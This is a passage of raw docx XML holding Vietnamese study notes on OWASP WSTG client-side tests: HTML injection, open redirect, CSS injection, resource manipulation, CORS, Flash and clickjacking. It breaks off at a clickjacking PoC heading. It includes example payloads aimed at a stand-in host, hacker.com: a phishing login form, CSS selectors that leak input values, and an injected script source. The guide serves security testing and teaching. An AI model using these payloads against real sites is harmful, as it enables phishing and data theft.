        <w:t>Input vào form bình luận: &lt;h1&gt;HACKED BY ME&lt;/h1&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688F631B" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:t>Nếu chữ "HACKED BY ME" hiện to đùng -&gt; Lỗi HTML Injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD9EBA2" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Phishing:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A154C">
        <w:t xml:space="preserve"> Chèn một form đăng nhập giả mạo: &lt;form action="http://hacker.com/login"&gt;User:&lt;input&gt;Pass:&lt;input&gt;&lt;button&gt;Login&lt;/button&gt;&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46318F93" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.11.4 Testing for Client-side URL Redirect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765DDF8D" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mã WSTG:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A154C">
        <w:t xml:space="preserve"> WSTG-CLNT-04</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A562CAC" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Mục tiêu kiểm thử</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FC6D1F" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:r w:rsidRPr="000A154C">
        <w:t>Tìm các đoạn mã JS tự động chuyển hướng người dùng dựa trên tham số đầu vào. Đây là lỗ hổng Open Redirect dạng DOM-based.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF2FF4D" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Lý thuyết &amp; Kỹ thuật</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5138F9EC" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sink nguy hiểm:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A154C">
        <w:t xml:space="preserve"> location.href, window.location, location.assign().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D8C17B" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kịch bản:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A154C">
        <w:t xml:space="preserve"> JS lấy tham số returnUrl từ URL và gán vào window.location.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438350FE" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Ví dụ Minh họa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC6FACA" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:t>URL: http://site.com/login?returnUrl=http://hacker.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8FDB0B" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:t>JS Code: window.location = getParam('returnUrl');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD30FA9" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:t>Hậu quả: Người dùng bị chuyển hướng sang trang độc hại sau khi đăng nhập.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080C97FF" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.11.5 Testing for CSS Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662FBDB1" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mã WSTG:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A154C">
        <w:t xml:space="preserve"> WSTG-CLNT-05</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508D2802" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Mục tiêu kiểm thử</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5244C678" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:r w:rsidRPr="000A154C">
        <w:lastRenderedPageBreak/>
        <w:t>Kiểm tra khả năng chèn mã CSS tùy ý. Mặc dù thường bị coi nhẹ, CSS Injection có thể dùng để đánh cắp dữ liệu (CSRF token) hoặc làm vỡ giao diện.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337EB918" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Kỹ thuật</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8F9CD8" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exfiltration:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A154C">
        <w:t xml:space="preserve"> Sử dụng CSS Selector để đoán nội dung trang web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6380DD1D" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:t>input[value^="a"] { background-image: url("[http://hacker.com/log?key=a](http://hacker.com/log?key=a)"); }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AF88C9" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:t>input[value^="b"] { background-image: url("[http://hacker.com/log?key=b](http://hacker.com/log?key=b)"); }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261F6C66" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:t>Nếu input bắt đầu bằng "a", trình duyệt sẽ tải ảnh từ server hacker -&gt; Hacker biết ký tự đầu là "a".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8E55AE" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.11.6 Testing for Client-side Resource Manipulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5579B8C5" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mã WSTG:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A154C">
        <w:t xml:space="preserve"> WSTG-CLNT-06</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B23F20" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Mục tiêu kiểm thử</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062C7523" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:r w:rsidRPr="000A154C">
        <w:t>Kiểm tra xem người dùng có thể can thiệp vào đường dẫn của các tài nguyên (JS, CSS, Image) được tải về hay không.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72967044" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Ví dụ Minh họa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105DD585" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:t>URL: site.com/page?lang=en</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD509AF" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:t>HTML Render: &lt;script src="/js/lang_en.js"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E16B85" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:t>Tấn công: site.com/page?lang=http://hacker.com/evil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E6AB5A" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:t>HTML Render: &lt;script src="http://hacker.com/evil.js"&gt;&lt;/script&gt; -&gt; XSS thông qua việc chèn nguồn script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274873F6" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.11.7 Testing Cross Origin Resource Sharing (CORS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21957D29" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mã WSTG:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A154C">
        <w:t xml:space="preserve"> WSTG-CLNT-07</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEF4ABC" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Mục tiêu kiểm thử</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D12FB05" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:r w:rsidRPr="000A154C">
        <w:t>Kiểm tra cấu hình CORS để xem server có cho phép các domain lạ đọc dữ liệu nhạy cảm hay không.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C34B7E0" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Lý thuyết &amp; Kỹ thuật</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7EC3AC" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cấu hình yếu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73257945" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:t>Access-Control-Allow-Origin: * (Cho phép tất cả, nhưng thường không cho phép gửi Cookie).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAA3975" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:lastRenderedPageBreak/>
        <w:t>Access-Control-Allow-Origin: null (Nguy hiểm).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406B4533" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:t>Phản hồi Allow-Origin dựa trên Origin của request (Reflected Origin).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4A8D91" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Ví dụ &amp; Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D25DDED" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:t>Gửi Request: Origin: http://hacker.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BF9673" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:t>Server trả về:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FBB351" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:t>Access-Control-Allow-Origin: [http://hacker.com](http://hacker.com)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531ACF84" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:t>Access-Control-Allow-Credentials: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4697D16C" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hậu quả:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A154C">
        <w:t xml:space="preserve"> Hacker tạo trang web dùng JS gửi request đến server mục tiêu, trình duyệt sẽ cho phép hacker đọc nội dung phản hồi (bao gồm dữ liệu cá nhân của user đang login).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4949F2B4" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.11.8 Testing for Cross Site Flashing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F0AE65" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mã WSTG:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A154C">
        <w:t xml:space="preserve"> WSTG-CLNT-08</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105F2BB7" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Tổng quan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1CC8D9" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:r w:rsidRPr="000A154C">
        <w:t>Kiểm tra các tệp Adobe Flash (.swf). Do Flash đã bị khai tử (EOL) từ 2020, mục này chủ yếu áp dụng cho các hệ thống cũ (Legacy).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2151FD9B" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Trọng tâm:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A154C">
        <w:t xml:space="preserve"> Kiểm tra file crossdomain.xml và các biến đầu vào của file SWF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617AF5CE" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.11.9 Testing for Clickjacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4534B927" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mã WSTG:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A154C">
        <w:t xml:space="preserve"> WSTG-CLNT-09</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AFD46E" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Mục tiêu kiểm thử</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E752978" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:r w:rsidRPr="000A154C">
        <w:t>Kiểm tra xem trang web có thể bị nhúng vào một khung hình (&lt;iframe&gt;) trên trang web khác hay không.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC4D28F" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Lý thuyết &amp; Kỹ thuật</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCE9C6D" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tấn công:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A154C">
        <w:t xml:space="preserve"> Hacker tạo trang web có nút "Nhận thưởng". Bên trên nút đó, hắn phủ một lớp iframe </w:t>
      </w:r>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>trong suốt</w:t>
      </w:r>
      <w:r w:rsidRPr="000A154C">
        <w:t xml:space="preserve"> chứa nút "Chuyển tiền" của trang ngân hàng. Người dùng tưởng bấm "Nhận thưởng" nhưng thực ra bấm "Chuyển tiền".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D53F1C4" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Phòng chống:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A154C">
        <w:t xml:space="preserve"> Header X-Frame-Options: DENY hoặc SAMEORIGIN. Content-Security-Policy: frame-ancestors 'self'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286EC2E6" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Lab Thực hành: Clickjacking PoC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C37AB1A" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
        <w:t>Tạo file poc.html:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EABCB1A" w14:textId="77777777" w:rsidR="000A154C" w:rsidRPr="000A154C" w:rsidRDefault="000A154C" w:rsidP="000A154C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A154C">
